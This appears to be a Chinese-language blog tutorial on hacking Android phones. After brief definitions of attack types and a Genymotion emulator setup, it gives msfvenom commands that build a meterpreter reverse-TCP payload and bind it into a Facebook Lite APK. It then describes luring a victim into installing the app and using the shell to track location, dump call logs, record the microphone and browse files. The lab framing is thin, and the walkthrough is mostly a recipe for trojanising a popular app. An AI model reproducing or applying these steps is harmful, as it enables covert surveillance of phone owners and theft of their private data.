入侵Android手机

在数字时代,移动电话已成为我们日常生活中不可或缺的一部分,充当个人助理、通信设备和互联网网关。然而,它们提供的便利也伴随着安全漏洞的风险。

什么是手机黑客?这是指未经授权的访问、操纵或利用移动设备及其数据。手机黑客攻击的各个方面,包括黑客使用的方法,包括但不限于恶意软件、网络钓鱼、网络攻击和社会工程。

  • 恶意软件:旨在渗透、破坏或未经授权访问计算机系统(包括移动设备)的恶意软件。示例包括病毒、蠕虫、特洛伊木马和间谍软件。
  • 网络钓鱼:一种网络攻击方法,通过在电子通信中伪装成值得信赖的实体,诱骗个人泄露敏感信息,例如用户名、密码或财务数据。
  • 中间人 (MitM) 攻击:一种网络攻击,攻击者在不知情的情况下拦截并可能改变两方之间的通信。这可以在网络环境中执行,包括 Wi-Fi 连接。
  • 社会工程:通常通过心理操纵而不是技术手段操纵个人泄露机密信息或执行危害安全的行为。

在本次实际演示中,我们利用了针对Android设备的恶意软件和网络钓鱼技术的有效组合。然后,我们将使用msfvenom制作一个恶意应用程序,并有策略地诱使受害者下载并安装它。这种欺骗性的策略使我们能够完全访问和控制他们的手机,这表明成为此类网络威胁受害者的严重后果。

实验室设置

首先,我们必须在 kali Linux 上建立我们的移动黑客实验室。

为了对 Android 设备和应用程序进行评估,我们需要真实的或模拟的 Android 设备。

在本次实践中,我们使用了真实设备,但这里有一个公会来安装Genymotion一个 Android 模拟器,它具有一整套传感器和功能,以便与虚拟 Android 环境进行交互。

为了正确下载这个应用程序并将其安装在我们的kali linux上,我们访问了Genymotion官方网站下载页面

入侵Android手机

要安装,我们导航到下载文件的目录并运行以下命令。

入侵Android手机

执行并记下系统上的此目录。

入侵Android手机

我们还安装virtualbox和adb

入侵Android手机

要运行 genymotion,我们导航到上面突出显示的目录。

入侵Android手机

并运行,应用程序应该弹出。

入侵Android手机

我们通过单击此处创建了一个帐户。

入侵Android手机

我们被重定向到此页面。

入侵Android手机

接下来我们登录选择这个选项

入侵Android手机

终于启动并运行了

入侵Android手机

现在让我们添加一个设备

入侵Android手机
入侵Android手机

全部点击下一步

入侵Android手机

安装

入侵Android手机
入侵Android手机

我们的虚拟电话已启动并正在运行。

入侵Android手机

我们现在需要做的就是使用msfvenom生成恶意应用程序并将其发送给受害者。

生成我们的有效负载

msfvenom是 Metasploit 框架中的一个强大工具,Metasploit 框架是一个广泛使用的渗透测试和利用工具包。msfvenom允许安全专业人员和道德黑客为各种攻击生成自定义有效负载。这些有效负载可以针对各种平台和目的而设计,包括远程代码执行、shell 访问等。

该工具允许用户指定有效负载类型、编码技术、输出格式和其他参数,从而提供了制作有效负载的灵活性。

我们使用以下命令使用msfvenom创建恶意APK

sudo msfvenom -platform android -a java -p android/meterpreter/reverse_tcp LHOST=<攻击者IP> LPORT=<端口> -f raw -omale.apk

获取我们的攻击者IP

入侵Android手机

将我们的有效负载与 Facebook Lite 绑定

我在这里从 apkpure 下载了 Facebook Lite APK

入侵Android手机
入侵Android手机

我们使用以下命令将APK绑定到payload

sudo msfvenom --platform android -a java -p android/meterpreter/reverse_tcp -x Facebook_Lite_401.0.0.14.110_Apkpure.apk LHOST=Atacker_IP LPORT=端口 -omaleFB.apk
入侵Android手机

服务和下载 发送应用程序

我们可以使用各种方法将应用程序发送给受害者,这里我们使用一个简单的 python http 服务器来为应用程序提供服务。

入侵Android手机

通过受害者浏览器下载恶意应用程序。

入侵Android手机

截至 2024 年 4 月 4 日,我们的恶意应用程序通过了所有 Android 安全检查。

入侵Android手机

获取受害者的电话

为此,我们将使用 msfconsole 来设置反向 shell 处理程序和必要的参数。

入侵Android手机
入侵Android手机

现在我们通过单击 MainActivity apk 在 Android 手机上启动该应用程序。

入侵Android手机

繁荣!我们在受害者的手机上安装了 meterpreter shell!

获取有关远程系统的信息,例如我们运行的操作系统;

入侵Android手机

获取我们运行时服务器正在运行的用户;获取用户ID

入侵Android手机

我们使用help命令来查看可以在目标上运行的所有可能的命令。

入侵Android手机
入侵Android手机

要检查设备是否已取得 root 权限或越狱,我们运行check_root。

我们还使用geolocate命令来查看设备的当前位置

入侵Android手机

我们使用dump_calllog命令检索受害者的所有通话记录

入侵Android手机
入侵Android手机

我们还可以通过运行webcam_list查看设备有多少个网络摄像头。

入侵Android手机

我们还使用 record_mic 命令来窃听用户。

入侵Android手机
入侵Android手机

文件系统访问

我们有完整的文件系统,我们可以上传文件、下载文件和读取文件内容,如下所示;

入侵Android手机
© 版权声明
THE END
喜欢就支持一下吧
点赞9 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容